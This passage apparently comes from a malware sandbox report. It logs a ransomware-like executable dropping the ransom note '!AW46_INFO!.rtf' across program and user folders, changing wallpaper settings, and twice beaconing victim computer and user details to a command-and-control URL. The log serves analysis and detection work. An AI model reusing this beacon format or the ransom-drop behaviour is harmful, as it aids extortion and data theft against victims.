File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\datareporting\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AJM03J3Y\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TGVUK4BG\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Public\Recorded TV\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\ext\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe HTTP URL 13 http://ghb.timerz.org/addrecord.php?apikey=aw46_api_key&compuser=AVGLFESB|Admin&sid=xz18piMEcQLJmCJV&phase=[FIN]04351D31AC164F90|3306|53|3359 Process not Found File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\MSBuild\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Documents\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\skins\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe HTTP URL 9 http://ghb.timerz.org/addrecord.php?apikey=aw46_api_key&compuser=AVGLFESB|Admin&sid=xz18piMEcQLJmCJV&phase=04351D31AC164F90|3359|1GB Process not Found File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\All Users\Microsoft\MF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\browser\features\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Favorites\MSN Websites\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Africa\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\bin\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Public\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\America\Argentina\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\hrtfs\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Extensions\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\plugins\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Public\Music\Sample Music\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\WidevineCdm\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Saved Games\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\d5vrebxd.default-release\cache2\entries\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\Favorites\Microsoft Websites\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\defaults\pref\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Mozilla Firefox\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Recovery\f840bc82-aff2-11ea-839f-f21450b4f854\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\ProgramData\Mozilla\updates\308046B0AF4A39CB\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\d5vrebxd.default-release\storage\permanent\chrome\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Users\Public\Desktop\!AW46_INFO!.rtf 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File created C:\Program 